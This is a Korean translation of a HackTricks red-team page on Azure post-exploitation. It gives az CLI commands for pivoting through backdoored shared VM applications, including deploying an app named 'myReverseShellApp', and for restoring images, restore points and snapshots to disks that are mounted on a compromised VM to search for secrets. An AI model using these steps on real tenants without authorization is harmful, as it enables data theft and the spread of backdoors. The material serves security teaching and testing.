Az - VMs & Network Post Exploitation
Reading time: 5 minutes
tip
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
Azure 해킹 배우기 및 연습하기:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
VMs & Network
Azure VMs 및 네트워킹에 대한 자세한 정보는 다음 페이지를 확인하세요:
Az - Virtual Machines & Network
VM Application Pivoting
VM 애플리케이션은 다른 구독 및 테넌트와 공유될 수 있습니다. 애플리케이션이 공유되고 있다면, 아마도 사용되고 있기 때문일 것입니다. 따라서 공격자가 애플리케이션을 침해하고 백도어가 포함된 버전을 업로드하면 다른 테넌트나 구독에서 실행될 가능성이 있습니다.
이미지 내 민감한 정보
과거에 VM에서 촬영된 이미지 내에서 민감한 정보를 찾는 것이 가능할 수 있습니다.
- 갤러리에서 이미지 나열
# Get galleries
az sig list -o table
# List images inside gallery
az sig image-definition list \
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
-o table
# Get images versions
az sig image-version list \
--resource-group <RESOURCE_GROUP> \
--gallery-name <GALLERY_NAME> \
--gallery-image-definition <IMAGE_DEFINITION> \
-o table
- 사용자 정의 이미지 목록
az image list -o table
- 이미지 ID로 VM 생성 및 그 안에서 민감한 정보 검색
# Create VM from image
az vm create \
--resource-group <RESOURCE_GROUP> \
--name <VM_NAME> \
--image /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/galleries/<GALLERY_NAME>/images/<IMAGE_DEFINITION>/versions/<IMAGE_VERSION> \
--admin-username <ADMIN_USERNAME> \
--generate-ssh-keys
복원 지점의 민감한 정보
복원 지점 안에 민감한 정보가 있을 수 있습니다.
- 복원 지점 나열
az restore-point list \
--resource-group <RESOURCE_GROUP> \
--restore-point-collection-name <COLLECTION_NAME> \
-o table
- 복원 지점에서 디스크 생성
az disk create \
--resource-group <RESOURCE_GROUP> \
--name <NEW_DISK_NAME> \
--source /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/restorePointCollections/<COLLECTION_NAME>/restorePoints/<RESTORE_POINT_NAME>
- 디스크를 VM에 연결하기 (공격자는 이미 계정 내에서 VM을 침해해야 함)
az vm disk attach \
--resource-group <RESOURCE_GROUP> \
--vm-name <VM_NAME> \
--name <DISK_NAME>
- 디스크를 마운트하고 민감한 정보 검색하기
# List all available disks
sudo fdisk -l
# Check disk format
sudo file -s /dev/sdX
# Mount it
sudo mkdir /mnt/mydisk
sudo mount /dev/sdX1 /mnt/mydisk
디스크 및 스냅샷의 민감한 정보
디스크 또는 이전 디스크의 스냅샷 안에 민감한 정보를 찾는 것이 가능할 수 있습니다.
- 스냅샷 목록
az snapshot list \
--resource-group <RESOURCE_GROUP> \
-o table
- 스냅샷에서 디스크 생성 (필요한 경우)
az disk create \
--resource-group <RESOURCE_GROUP> \
--name <DISK_NAME> \
--source <SNAPSHOT_ID> \
--size-gb <DISK_SIZE>
- 디스크를 VM에 연결하고 마운트하여 민감한 정보를 검색합니다(이 방법에 대한 내용은 이전 섹션을 참조하세요).
VM 확장 및 VM 애플리케이션의 민감한 정보
VM 확장 및 VM 애플리케이션 내부에서 민감한 정보를 찾는 것이 가능할 수 있습니다.
- 모든 VM 앱 나열
## List all VM applications inside a gallery
az sig gallery-application list --gallery-name <gallery-name> --resource-group <res-group> --output table
- VM에 확장을 설치하고 민감한 정보 검색
az vm application set \
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true
tip
AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)
Azure 해킹 배우기 및 연습하기:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.